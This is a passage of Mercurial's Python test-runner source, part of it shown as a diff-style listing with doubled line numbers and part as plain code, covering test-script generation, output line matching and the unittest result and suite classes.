1735 # After we run the shell script, we re-unify the script output
1735 # After we run the shell script, we re-unify the script output
1736 # with non-active parts of the source, with synchronization by our
1736 # with non-active parts of the source, with synchronization by our
1737 # SALT line number markers. The after table contains the non-active
1737 # SALT line number markers. The after table contains the non-active
1738 # components, ordered by line number.
1738 # components, ordered by line number.
1739 after = {}
1739 after = {}
1740
1740
1741 # Expected shell script output.
1741 # Expected shell script output.
1742 expected = {}
1742 expected = {}
1743
1743
1744 pos = prepos = -1
1744 pos = prepos = -1
1745
1745
1746 # True or False when in a true or false conditional section
1746 # True or False when in a true or false conditional section
1747 skipping = None
1747 skipping = None
1748
1748
1749 # We keep track of whether or not we're in a Python block so we
1749 # We keep track of whether or not we're in a Python block so we
1750 # can generate the surrounding doctest magic.
1750 # can generate the surrounding doctest magic.
1751 inpython = False
1751 inpython = False
1752
1752
1753 if self._debug:
1753 if self._debug:
1754 script.append(b'set -x\n')
1754 script.append(b'set -x\n')
1755 if self._hgcommand != b'hg':
1755 if self._hgcommand != b'hg':
1756 script.append(b'alias hg="%s"\n' % self._hgcommand)
1756 script.append(b'alias hg="%s"\n' % self._hgcommand)
1757 if os.getenv('MSYSTEM'):
1757 if os.getenv('MSYSTEM'):
1758 script.append(b'alias pwd="pwd -W"\n')
1758 script.append(b'alias pwd="pwd -W"\n')
1759
1759
1760 if hgcatapult and hgcatapult != os.devnull:
1760 if hgcatapult and hgcatapult != os.devnull:
1761 if PYTHON3:
1761 if PYTHON3:
1762 hgcatapult = hgcatapult.encode('utf8')
1762 hgcatapult = hgcatapult.encode('utf8')
1763 cataname = self.name.encode('utf8')
1763 cataname = self.name.encode('utf8')
1764 else:
1764 else:
1765 cataname = self.name
1765 cataname = self.name
1766
1766
1767 # Kludge: use a while loop to keep the pipe from getting
1767 # Kludge: use a while loop to keep the pipe from getting
1768 # closed by our echo commands. The still-running file gets
1768 # closed by our echo commands. The still-running file gets
1769 # reaped at the end of the script, which causes the while
1769 # reaped at the end of the script, which causes the while
1770 # loop to exit and closes the pipe. Sigh.
1770 # loop to exit and closes the pipe. Sigh.
1771 script.append(
1771 script.append(
1772 b'rtendtracing() {\n'
1772 b'rtendtracing() {\n'
1773 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1773 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1774 b' rm -f "$TESTTMP/.still-running"\n'
1774 b' rm -f "$TESTTMP/.still-running"\n'
1775 b'}\n'
1775 b'}\n'
1776 b'trap "rtendtracing" 0\n'
1776 b'trap "rtendtracing" 0\n'
1777 b'touch "$TESTTMP/.still-running"\n'
1777 b'touch "$TESTTMP/.still-running"\n'
1778 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1778 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1779 b'> %(catapult)s &\n'
1779 b'> %(catapult)s &\n'
1780 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1780 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1781 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1781 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1782 % {
1782 % {
1783 b'name': cataname,
1783 b'name': cataname,
1784 b'session': session,
1784 b'session': session,
1785 b'catapult': hgcatapult,
1785 b'catapult': hgcatapult,
1786 }
1786 }
1787 )
1787 )
1788
1788
1789 if self._case:
1789 if self._case:
1790 casestr = b'#'.join(self._case)
1790 casestr = b'#'.join(self._case)
1791 if isinstance(casestr, str):
1791 if isinstance(casestr, str):
1792 quoted = shellquote(casestr)
1792 quoted = shellquote(casestr)
1793 else:
1793 else:
1794 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1794 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1795 script.append(b'TESTCASE=%s\n' % quoted)
1795 script.append(b'TESTCASE=%s\n' % quoted)
1796 script.append(b'export TESTCASE\n')
1796 script.append(b'export TESTCASE\n')
1797
1797
1798 n = 0
1798 n = 0
1799 for n, l in enumerate(lines):
1799 for n, l in enumerate(lines):
1800 if not l.endswith(b'\n'):
1800 if not l.endswith(b'\n'):
1801 l += b'\n'
1801 l += b'\n'
1802 if l.startswith(b'#require'):
1802 if l.startswith(b'#require'):
1803 lsplit = l.split()
1803 lsplit = l.split()
1804 if len(lsplit) < 2 or lsplit[0] != b'#require':
1804 if len(lsplit) < 2 or lsplit[0] != b'#require':
1805 after.setdefault(pos, []).append(
1805 after.setdefault(pos, []).append(
1806 b' !!! invalid #require\n'
1806 b' !!! invalid #require\n'
1807 )
1807 )
1808 if not skipping:
1808 if not skipping:
1809 haveresult, message = self._hghave(lsplit[1:])
1809 haveresult, message = self._hghave(lsplit[1:])
1810 if not haveresult:
1810 if not haveresult:
1811 script = [b'echo "%s"\nexit 80\n' % message]
1811 script = [b'echo "%s"\nexit 80\n' % message]
1812 break
1812 break
1813 after.setdefault(pos, []).append(l)
1813 after.setdefault(pos, []).append(l)
1814 elif l.startswith(b'#if'):
1814 elif l.startswith(b'#if'):
1815 lsplit = l.split()
1815 lsplit = l.split()
1816 if len(lsplit) < 2 or lsplit[0] != b'#if':
1816 if len(lsplit) < 2 or lsplit[0] != b'#if':
1817 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1817 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1818 if skipping is not None:
1818 if skipping is not None:
1819 after.setdefault(pos, []).append(b' !!! nested #if\n')
1819 after.setdefault(pos, []).append(b' !!! nested #if\n')
1820 skipping = not self._iftest(lsplit[1:])
1820 skipping = not self._iftest(lsplit[1:])
1821 after.setdefault(pos, []).append(l)
1821 after.setdefault(pos, []).append(l)
1822 elif l.startswith(b'#else'):
1822 elif l.startswith(b'#else'):
1823 if skipping is None:
1823 if skipping is None:
1824 after.setdefault(pos, []).append(b' !!! missing #if\n')
1824 after.setdefault(pos, []).append(b' !!! missing #if\n')
1825 skipping = not skipping
1825 skipping = not skipping
1826 after.setdefault(pos, []).append(l)
1826 after.setdefault(pos, []).append(l)
1827 elif l.startswith(b'#endif'):
1827 elif l.startswith(b'#endif'):
1828 if skipping is None:
1828 if skipping is None:
1829 after.setdefault(pos, []).append(b' !!! missing #if\n')
1829 after.setdefault(pos, []).append(b' !!! missing #if\n')
1830 skipping = None
1830 skipping = None
1831 after.setdefault(pos, []).append(l)
1831 after.setdefault(pos, []).append(l)
1832 elif skipping:
1832 elif skipping:
1833 after.setdefault(pos, []).append(l)
1833 after.setdefault(pos, []).append(l)
1834 elif l.startswith(b' >>> '): # python inlines
1834 elif l.startswith(b' >>> '): # python inlines
1835 after.setdefault(pos, []).append(l)
1835 after.setdefault(pos, []).append(l)
1836 prepos = pos
1836 prepos = pos
1837 pos = n
1837 pos = n
1838 if not inpython:
1838 if not inpython:
1839 # We've just entered a Python block. Add the header.
1839 # We've just entered a Python block. Add the header.
1840 inpython = True
1840 inpython = True
1841 addsalt(prepos, False) # Make sure we report the exit code.
1841 addsalt(prepos, False) # Make sure we report the exit code.
1842 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1842 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1843 addsalt(n, True)
1843 addsalt(n, True)
1844 script.append(l[2:])
1844 script.append(l[2:])
1845 elif l.startswith(b' ... '): # python inlines
1845 elif l.startswith(b' ... '): # python inlines
1846 after.setdefault(prepos, []).append(l)
1846 after.setdefault(prepos, []).append(l)
1847 script.append(l[2:])
1847 script.append(l[2:])
1848 elif l.startswith(b' $ '): # commands
1848 elif l.startswith(b' $ '): # commands
1849 if inpython:
1849 if inpython:
1850 script.append(b'EOF\n')
1850 script.append(b'EOF\n')
1851 inpython = False
1851 inpython = False
1852 after.setdefault(pos, []).append(l)
1852 after.setdefault(pos, []).append(l)
1853 prepos = pos
1853 prepos = pos
1854 pos = n
1854 pos = n
1855 addsalt(n, False)
1855 addsalt(n, False)
1856 rawcmd = l[4:]
1856 rawcmd = l[4:]
1857 cmd = rawcmd.split()
1857 cmd = rawcmd.split()
1858 toggletrace(rawcmd)
1858 toggletrace(rawcmd)
1859 if len(cmd) == 2 and cmd[0] == b'cd':
1859 if len(cmd) == 2 and cmd[0] == b'cd':
1860 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1860 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1861 script.append(rawcmd)
1861 script.append(rawcmd)
1862 elif l.startswith(b' > '): # continuations
1862 elif l.startswith(b' > '): # continuations
1863 after.setdefault(prepos, []).append(l)
1863 after.setdefault(prepos, []).append(l)
1864 script.append(l[4:])
1864 script.append(l[4:])
1865 elif l.startswith(b' '): # results
1865 elif l.startswith(b' '): # results
1866 # Queue up a list of expected results.
1866 # Queue up a list of expected results.
1867 expected.setdefault(pos, []).append(l[2:])
1867 expected.setdefault(pos, []).append(l[2:])
1868 else:
1868 else:
1869 if inpython:
1869 if inpython:
1870 script.append(b'EOF\n')
1870 script.append(b'EOF\n')
1871 inpython = False
1871 inpython = False
1872 # Non-command/result. Queue up for merged output.
1872 # Non-command/result. Queue up for merged output.
1873 after.setdefault(pos, []).append(l)
1873 after.setdefault(pos, []).append(l)
1874
1874
1875 if inpython:
1875 if inpython:
1876 script.append(b'EOF\n')
1876 script.append(b'EOF\n')
1877 if skipping is not None:
1877 if skipping is not None:
1878 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1878 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1879 addsalt(n + 1, False)
1879 addsalt(n + 1, False)
1880 # Need to end any current per-command trace
1880 # Need to end any current per-command trace
1881 if activetrace:
1881 if activetrace:
1882 toggletrace()
1882 toggletrace()
1883 return salt, script, after, expected
1883 return salt, script, after, expected
1884
1884
1885 def _processoutput(self, exitcode, output, salt, after, expected):
1885 def _processoutput(self, exitcode, output, salt, after, expected):
1886 # Merge the script output back into a unified test.
1886 # Merge the script output back into a unified test.
1887 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1887 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1888 if exitcode != 0:
1888 if exitcode != 0:
1889 warnonly = WARN_NO
1889 warnonly = WARN_NO
1890
1890
1891 pos = -1
1891 pos = -1
1892 postout = []
1892 postout = []
1893 for out_rawline in output:
1893 for out_rawline in output:
1894 out_line, cmd_line = out_rawline, None
1894 out_line, cmd_line = out_rawline, None
1895 if salt in out_rawline:
1895 if salt in out_rawline:
1896 out_line, cmd_line = out_rawline.split(salt, 1)
1896 out_line, cmd_line = out_rawline.split(salt, 1)
1897
1897
1898 pos, postout, warnonly = self._process_out_line(
1898 pos, postout, warnonly = self._process_out_line(
1899 out_line, pos, postout, expected, warnonly
1899 out_line, pos, postout, expected, warnonly
1900 )
1900 )
1901 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1901 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1902
1902
1903 if pos in after:
1903 if pos in after:
1904 postout += after.pop(pos)
1904 postout += after.pop(pos)
1905
1905
1906 if warnonly == WARN_YES:
1906 if warnonly == WARN_YES:
1907 exitcode = False # Set exitcode to warned.
1907 exitcode = False # Set exitcode to warned.
1908
1908
1909 return exitcode, postout
1909 return exitcode, postout
1910
1910
1911 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1911 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1912 while out_line:
1912 while out_line:
1913 if not out_line.endswith(b'\n'):
1913 if not out_line.endswith(b'\n'):
1914 out_line += b' (no-eol)\n'
1914 out_line += b' (no-eol)\n'
1915
1915
1916 # Find the expected output at the current position.
1916 # Find the expected output at the current position.
1917 els = [None]
1917 els = [None]
1918 if expected.get(pos, None):
1918 if expected.get(pos, None):
1919 els = expected[pos]
1919 els = expected[pos]
1920
1920
1921 optional = []
1921 optional = []
1922 for i, el in enumerate(els):
1922 for i, el in enumerate(els):
1923 r = False
1923 r = False
1924 if el:
1924 if el:
1925 r, exact = self.linematch(el, out_line)
1925 r, exact = self.linematch(el, out_line)
1926 if isinstance(r, str):
1926 if isinstance(r, str):
1927 if r == '-glob':
1927 if r == '-glob':
1928 out_line = ''.join(el.rsplit(' (glob)', 1))
1928 out_line = ''.join(el.rsplit(' (glob)', 1))
1929 r = '' # Warn only this line.
1929 r = '' # Warn only this line.
1930 elif r == "retry":
1930 elif r == "retry":
1931 postout.append(b' ' + el)
1931 postout.append(b' ' + el)
1932 else:
1932 else:
1933 log('\ninfo, unknown linematch result: %r\n' % r)
1933 log('\ninfo, unknown linematch result: %r\n' % r)
1934 r = False
1934 r = False
1935 if r:
1935 if r:
1936 els.pop(i)
1936 els.pop(i)
1937 break
1937 break
1938 if el:
1938 if el:
1939 if isoptional(el):
1939 if isoptional(el):
1940 optional.append(i)
1940 optional.append(i)
1941 else:
1941 else:
1942 m = optline.match(el)
1942 m = optline.match(el)
1943 if m:
1943 if m:
1944 conditions = [c for c in m.group(2).split(b' ')]
1944 conditions = [c for c in m.group(2).split(b' ')]
1945
1945
1946 if not self._iftest(conditions):
1946 if not self._iftest(conditions):
1947 optional.append(i)
1947 optional.append(i)
1948 if exact:
1948 if exact:
1949 # Don't allow line to be matches against a later
1949 # Don't allow line to be matches against a later
1950 # line in the output
1950 # line in the output
1951 els.pop(i)
1951 els.pop(i)
1952 break
1952 break
1953
1953
1954 if r:
1954 if r:
1955 if r == "retry":
1955 if r == "retry":
1956 continue
1956 continue
1957 # clean up any optional leftovers
1957 # clean up any optional leftovers
1958 for i in optional:
1958 for i in optional:
1959 postout.append(b' ' + els[i])
1959 postout.append(b' ' + els[i])
1960 for i in reversed(optional):
1960 for i in reversed(optional):
1961 del els[i]
1961 del els[i]
1962 postout.append(b' ' + el)
1962 postout.append(b' ' + el)
1963 else:
1963 else:
1964 if self.NEEDESCAPE(out_line):
1964 if self.NEEDESCAPE(out_line):
1965 out_line = TTest._stringescape(
1965 out_line = TTest._stringescape(
1966 b'%s (esc)\n' % out_line.rstrip(b'\n')
1966 b'%s (esc)\n' % out_line.rstrip(b'\n')
1967 )
1967 )
1968 postout.append(b' ' + out_line) # Let diff deal with it.
1968 postout.append(b' ' + out_line) # Let diff deal with it.
1969 if r != '': # If line failed.
1969 if r != '': # If line failed.
1970 warnonly = WARN_NO
1970 warnonly = WARN_NO
1971 elif warnonly == WARN_UNDEFINED:
1971 elif warnonly == WARN_UNDEFINED:
1972 warnonly = WARN_YES
1972 warnonly = WARN_YES
1973 break
1973 break
1974 else:
1974 else:
1975 # clean up any optional leftovers
1975 # clean up any optional leftovers
1976 while expected.get(pos, None):
1976 while expected.get(pos, None):
1977 el = expected[pos].pop(0)
1977 el = expected[pos].pop(0)
1978 if el:
1978 if el:
1979 if not isoptional(el):
1979 if not isoptional(el):
1980 m = optline.match(el)
1980 m = optline.match(el)
1981 if m:
1981 if m:
1982 conditions = [c for c in m.group(2).split(b' ')]
1982 conditions = [c for c in m.group(2).split(b' ')]
1983
1983
1984 if self._iftest(conditions):
1984 if self._iftest(conditions):
1985 # Don't append as optional line
1985 # Don't append as optional line
1986 continue
1986 continue
1987 else:
1987 else:
1988 continue
1988 continue
1989 postout.append(b' ' + el)
1989 postout.append(b' ' + el)
1990 return pos, postout, warnonly
1990 return pos, postout, warnonly
1991
1991
1992 def _process_cmd_line(self, cmd_line, pos, postout, after):
1992 def _process_cmd_line(self, cmd_line, pos, postout, after):
1993 """process a "command" part of a line from unified test output"""
1993 """process a "command" part of a line from unified test output"""
1994 if cmd_line:
1994 if cmd_line:
1995 # Add on last return code.
1995 # Add on last return code.
1996 ret = int(cmd_line.split()[1])
1996 ret = int(cmd_line.split()[1])
1997 if ret != 0:
1997 if ret != 0:
1998 postout.append(b' [%d]\n' % ret)
1998 postout.append(b' [%d]\n' % ret)
1999 if pos in after:
1999 if pos in after:
2000 # Merge in non-active test bits.
2000 # Merge in non-active test bits.
2001 postout += after.pop(pos)
2001 postout += after.pop(pos)
2002 pos = int(cmd_line.split()[0])
2002 pos = int(cmd_line.split()[0])
2003 return pos, postout
2003 return pos, postout
2004
2004
2005 @staticmethod
2005 @staticmethod
2006 def rematch(el, l):
2006 def rematch(el, l):
2007 try:
2007 try:
2008 # parse any flags at the beginning of the regex. Only 'i' is
2008 # parse any flags at the beginning of the regex. Only 'i' is
2009 # supported right now, but this should be easy to extend.
2009 # supported right now, but this should be easy to extend.
2010 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
2010 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
2011 flags = flags or b''
2011 flags = flags or b''
2012 el = flags + b'(?:' + el + b')'
2012 el = flags + b'(?:' + el + b')'
2013 # use \Z to ensure that the regex matches to the end of the string
2013 # use \Z to ensure that the regex matches to the end of the string
2014 if os.name == 'nt':
2014 if os.name == 'nt':
2015 return re.match(el + br'\r?\n\Z', l)
2015 return re.match(el + br'\r?\n\Z', l)
2016 return re.match(el + br'\n\Z', l)
2016 return re.match(el + br'\n\Z', l)
2017 except re.error:
2017 except re.error:
2018 # el is an invalid regex
2018 # el is an invalid regex
2019 return False
2019 return False
2020
2020
2021 @staticmethod
2021 @staticmethod
2022 def globmatch(el, l):
2022 def globmatch(el, l):
2023 # The only supported special characters are * and ? plus / which also
2023 # The only supported special characters are * and ? plus / which also
2024 # matches \ on windows. Escaping of these characters is supported.
2024 # matches \ on windows. Escaping of these characters is supported.
2025 if el + b'\n' == l:
2025 if el + b'\n' == l:
2026 if os.altsep:
2026 if os.altsep:
2027 # matching on "/" is not needed for this line
2027 # matching on "/" is not needed for this line
2028 for pat in checkcodeglobpats:
2028 for pat in checkcodeglobpats:
2029 if pat.match(el):
2029 if pat.match(el):
2030 return True
2030 return True
2031 return b'-glob'
2031 return b'-glob'
2032 return True
2032 return True
2033 el = el.replace(b'$LOCALIP', b'*')
2033 el = el.replace(b'$LOCALIP', b'*')
2034 i, n = 0, len(el)
2034 i, n = 0, len(el)
2035 res = b''
2035 res = b''
2036 while i < n:
2036 while i < n:
2037 c = el[i : i + 1]
2037 c = el[i : i + 1]
2038 i += 1
2038 i += 1
2039 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2039 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2040 res += el[i - 1 : i + 1]
2040 res += el[i - 1 : i + 1]
2041 i += 1
2041 i += 1
2042 elif c == b'*':
2042 elif c == b'*':
2043 res += b'.*'
2043 res += b'.*'
2044 elif c == b'?':
2044 elif c == b'?':
2045 res += b'.'
2045 res += b'.'
2046 elif c == b'/' and os.altsep:
2046 elif c == b'/' and os.altsep:
2047 res += b'[/\\\\]'
2047 res += b'[/\\\\]'
2048 else:
2048 else:
2049 res += re.escape(c)
2049 res += re.escape(c)
2050 return TTest.rematch(res, l)
2050 return TTest.rematch(res, l)
2051
2051
2052 def linematch(self, el, l):
2052 def linematch(self, el, l):
2053 if el == l: # perfect match (fast)
2053 if el == l: # perfect match (fast)
2054 return True, True
2054 return True, True
2055 retry = False
2055 retry = False
2056 if isoptional(el):
2056 if isoptional(el):
2057 retry = "retry"
2057 retry = "retry"
2058 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2058 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2059 else:
2059 else:
2060 m = optline.match(el)
2060 m = optline.match(el)
2061 if m:
2061 if m:
2062 conditions = [c for c in m.group(2).split(b' ')]
2062 conditions = [c for c in m.group(2).split(b' ')]
2063
2063
2064 el = m.group(1) + b"\n"
2064 el = m.group(1) + b"\n"
2065 if not self._iftest(conditions):
2065 if not self._iftest(conditions):
2066 # listed feature missing, should not match
2066 # listed feature missing, should not match
2067 return "retry", False
2067 return "retry", False
2068
2068
2069 if el.endswith(b" (esc)\n"):
2069 if el.endswith(b" (esc)\n"):
2070 if PYTHON3:
2070 if PYTHON3:
2071 el = el[:-7].decode('unicode_escape') + '\n'
2071 el = el[:-7].decode('unicode_escape') + '\n'
2072 el = el.encode('utf-8')
2072 el = el.encode('latin-1')
2073 else:
2073 else:
2074 el = el[:-7].decode('string-escape') + '\n'
2074 el = el[:-7].decode('string-escape') + '\n'
2075 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2075 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2076 return True, True
2076 return True, True
2077 if el.endswith(b" (re)\n"):
2077 if el.endswith(b" (re)\n"):
2078 return (TTest.rematch(el[:-6], l) or retry), False
2078 return (TTest.rematch(el[:-6], l) or retry), False
2079 if el.endswith(b" (glob)\n"):
2079 if el.endswith(b" (glob)\n"):
2080 # ignore '(glob)' added to l by 'replacements'
2080 # ignore '(glob)' added to l by 'replacements'
2081 if l.endswith(b" (glob)\n"):
2081 if l.endswith(b" (glob)\n"):
2082 l = l[:-8] + b"\n"
2082 l = l[:-8] + b"\n"
2083 return (TTest.globmatch(el[:-8], l) or retry), False
2083 return (TTest.globmatch(el[:-8], l) or retry), False
2084 if os.altsep:
2084 if os.altsep:
2085 _l = l.replace(b'\\', b'/')
2085 _l = l.replace(b'\\', b'/')
2086 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2086 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2087 return True, True
2087 return True, True
2088 return retry, True
2088 return retry, True
2089
2089
2090 @staticmethod
2090 @staticmethod
2091 def parsehghaveoutput(lines):
2091 def parsehghaveoutput(lines):
2092 '''Parse hghave log lines.
2092 '''Parse hghave log lines.
2093
2093
2094 Return tuple of lists (missing, failed):
2094 Return tuple of lists (missing, failed):
2095 * the missing/unknown features
2095 * the missing/unknown features
2096 * the features for which existence check failed'''
2096 * the features for which existence check failed'''
2097 missing = []
2097 missing = []
2098 failed = []
2098 failed = []
2099 for line in lines:
2099 for line in lines:
2100 if line.startswith(TTest.SKIPPED_PREFIX):
2100 if line.startswith(TTest.SKIPPED_PREFIX):
2101 line = line.splitlines()[0]
2101 line = line.splitlines()[0]
2102 missing.append(_bytes2sys(line[len(TTest.SKIPPED_PREFIX) :]))
2102 missing.append(_bytes2sys(line[len(TTest.SKIPPED_PREFIX) :]))
2103 elif line.startswith(TTest.FAILED_PREFIX):
2103 elif line.startswith(TTest.FAILED_PREFIX):
2104 line = line.splitlines()[0]
2104 line = line.splitlines()[0]
2105 failed.append(_bytes2sys(line[len(TTest.FAILED_PREFIX) :]))
2105 failed.append(_bytes2sys(line[len(TTest.FAILED_PREFIX) :]))
2106
2106
2107 return missing, failed
2107 return missing, failed
2108
2108
2109 @staticmethod
2109 @staticmethod
2110 def _escapef(m):
2110 def _escapef(m):
2111 return TTest.ESCAPEMAP[m.group(0)]
2111 return TTest.ESCAPEMAP[m.group(0)]
2112
2112
2113 @staticmethod
2113 @staticmethod
2114 def _stringescape(s):
2114 def _stringescape(s):
2115 return TTest.ESCAPESUB(TTest._escapef, s)
2115 return TTest.ESCAPESUB(TTest._escapef, s)
2116
2116
2117
2117
# Serialize console output across worker threads, and guard the
# "first failure" bookkeeping below.
iolock = threading.RLock()
firstlock = threading.RLock()
firsterror = False
2121
2121
2122
2122
class TestResult(unittest._TextTestResult):
    """Holds results when executing via unittest."""

    # Accessing the non-public _TextTestResult is relatively common in
    # Python testing tools, so don't worry too much about it.
    def __init__(self, options, *args, **kwargs):
        super(TestResult, self).__init__(*args, **kwargs)

        self._options = options

        # unittest.TestResult didn't have skipped until 2.7; polyfill it.
        self.skipped = []

        # Custom "ignored" result that isn't present in any stock Python
        # unittest implementation.  Very similar to skipped; may be folded
        # into skip some day.
        self.ignored = []

        self.times = []
        self._firststarttime = None
        # Data stored for the benefit of generating xunit reports.
        self.successes = []
        self.faildata = {}

        if options.color == 'never':
            self.color = False
        elif options.color == 'auto':
            self.color = pygmentspresent and self.stream.isatty()
        else:  # 'always', for testing purposes
            self.color = pygmentspresent

    def onStart(self, test):
        """ Can be overriden by custom TestResult
        """

    def onEnd(self):
        """ Can be overriden by custom TestResult
        """

    def addFailure(self, test, reason):
        self.failures.append((test, reason))

        if self._options.first:
            self.stop()
            return
        with iolock:
            if reason == "timed out":
                self.stream.write('t')
            else:
                if not self._options.nodiff:
                    self.stream.write('\n')
                    # Exclude the '\n' from highlighting to lex correctly
                    formatted = 'ERROR: %s output changed\n' % test
                    self.stream.write(highlightmsg(formatted, self.color))
                self.stream.write('!')

            self.stream.flush()

    def addSuccess(self, test):
        with iolock:
            super(TestResult, self).addSuccess(test)
            self.successes.append(test)

    def addError(self, test, err):
        super(TestResult, self).addError(test, err)
        if self._options.first:
            self.stop()

    # Polyfill.
    def addSkip(self, test, reason):
        self.skipped.append((test, reason))
        with iolock:
            if self.showAll:
                self.stream.writeln('skipped %s' % reason)
            else:
                self.stream.write('s')
                self.stream.flush()

    def addIgnore(self, test, reason):
        self.ignored.append((test, reason))
        with iolock:
            if self.showAll:
                self.stream.writeln('ignored %s' % reason)
            else:
                if reason not in ('not retesting', "doesn't match keyword"):
                    self.stream.write('i')
                else:
                    self.testsRun += 1
                self.stream.flush()

    def addOutputMismatch(self, test, ret, got, expected):
        """Record a mismatch in test output for a particular test."""
        if self.shouldStop or firsterror:
            # don't print, some other test case already failed and
            # printed, we're just stale and probably failed due to our
            # temp dir getting cleaned up.
            return

        accepted = False
        difflines = []

        with iolock:
            if self._options.nodiff:
                pass
            elif self._options.view:
                viewer = self._options.view
                subprocess.call(
                    r'"%s" "%s" "%s"'
                    % (
                        viewer,
                        _bytes2sys(test.refpath),
                        _bytes2sys(test.errpath),
                    ),
                    shell=True,
                )
            else:
                servefail, difflines = getdiff(
                    expected, got, test.refpath, test.errpath
                )
                self.stream.write('\n')
                for line in difflines:
                    line = highlightdiff(line, self.color)
                    if PYTHON3:
                        self.stream.flush()
                        self.stream.buffer.write(line)
                        self.stream.buffer.flush()
                    else:
                        self.stream.write(line)
                        self.stream.flush()

                if servefail:
                    raise test.failureException(
                        'server failed to start (HGPORT=%s)' % test._startport
                    )

            # handle interactive prompt without releasing iolock
            if self._options.interactive:
                if test.readrefout() != expected:
                    self.stream.write(
                        'Reference output has changed (run again to prompt '
                        'changes)'
                    )
                else:
                    self.stream.write('Accept this change? [y/N] ')
                    self.stream.flush()
                    answer = sys.stdin.readline().strip()
                    if answer.lower() in ('y', 'yes'):
                        if test.path.endswith(b'.t'):
                            rename(test.errpath, test.path)
                        else:
                            rename(test.errpath, '%s.out' % test.path)
                        accepted = True
            if not accepted:
                self.faildata[test.name] = b''.join(difflines)

        return accepted

    def startTest(self, test):
        super(TestResult, self).startTest(test)

        # os.times reports user/system CPU time of child processes along
        # with real elapsed time -- but only reliably on Linux, not on
        # Windows.  Wall time is therefore computed separately below.
        test.started_times = os.times()
        # TODO use a monotonic clock once support for Python 2.7 is dropped.
        test.started_time = time.time()
        if self._firststarttime is None:  # thread racy but irrelevant
            self._firststarttime = test.started_time

    def stopTest(self, test, interrupted=False):
        super(TestResult, self).stopTest(test)

        test.stopped_times = os.times()
        stopped_time = time.time()

        starttime = test.started_times
        endtime = test.stopped_times
        origin = self._firststarttime
        self.times.append(
            (
                test.name,
                endtime[2] - starttime[2],  # user space CPU time
                endtime[3] - starttime[3],  # sys space CPU time
                stopped_time - test.started_time,  # real time
                test.started_time - origin,  # start date in run context
                stopped_time - origin,  # end date in run context
            )
        )

        if interrupted:
            with iolock:
                self.stream.writeln(
                    'INTERRUPTED: %s (after %d seconds)'
                    % (test.name, self.times[-1][3])
                )
2317
2317
2318
2318
def getTestResult():
    """Return the TestResult class to use for this run.

    The CUSTOM_TEST_RESULT environment variable may name an importable
    module whose ``TestResult`` attribute replaces the default.
    """
    modname = os.environ.get("CUSTOM_TEST_RESULT")
    if modname is not None:
        return __import__(modname).TestResult
    return TestResult
2328
2328
2329
2329
class TestSuite(unittest.TestSuite):
    """Custom unittest TestSuite that knows how to execute Mercurial tests."""

    def __init__(
        self,
        testdir,
        jobs=1,
        whitelist=None,
        blacklist=None,
        retest=False,
        keywords=None,
        loop=False,
        runs_per_test=1,
        loadtest=None,
        showchannels=False,
        *args,
        **kwargs
    ):
        """Create a new instance that can run tests with a configuration.

        testdir specifies the directory where tests are executed from. This
        is typically the ``tests`` directory from Mercurial's source
        repository.

        jobs specifies the number of jobs to run concurrently. Each test
        executes on its own thread. Tests actually spawn new processes, so
        state mutation should not be an issue.

        If there is only one job, it will use the main thread.

        whitelist and blacklist denote tests that have been whitelisted and
        blacklisted, respectively. These arguments don't belong in TestSuite.
        Instead, whitelist and blacklist should be handled by the thing that
        populates the TestSuite with tests. They are present to preserve
        backwards compatible behavior which reports skipped tests as part
        of the results.

        retest denotes whether to retest failed tests. This arguably belongs
        outside of TestSuite.

        keywords denotes key words that will be used to filter which tests
        to execute. This arguably belongs outside of TestSuite.

        loop denotes whether to loop over tests forever.
        """
        super(TestSuite, self).__init__(*args, **kwargs)

        self._jobs = jobs
        self._whitelist = whitelist
        self._blacklist = blacklist
        self._retest = retest
        self._keywords = keywords
        self._loop = loop
        self._runs_per_test = runs_per_test
        self._loadtest = loadtest
        self._showchannels = showchannels

    def run(self, result):
        # A number of filters need applying.  Doing it here instead of
        # inside Test keeps the per-test running logic simple.
        tests = []
        num_tests = [0]
        for test in self._tests:

            def get():
                num_tests[0] += 1
                if getattr(test, 'should_reload', False):
                    return self._loadtest(test, num_tests[0])
                return test

            if not os.path.exists(test.path):
                result.addSkip(test, "Doesn't exist")
                continue

            if not (self._whitelist and test.bname in self._whitelist):
                if self._blacklist and test.bname in self._blacklist:
                    result.addSkip(test, 'blacklisted')
                    continue

                if self._retest and not os.path.exists(test.errpath):
                    result.addIgnore(test, 'not retesting')
                    continue

                if self._keywords:
                    # a test runs only if every keyword appears in its
                    # source or its name
                    with open(test.path, 'rb') as f:
                        haystack = f.read().lower() + test.bname.lower()
                    kw_missing = False
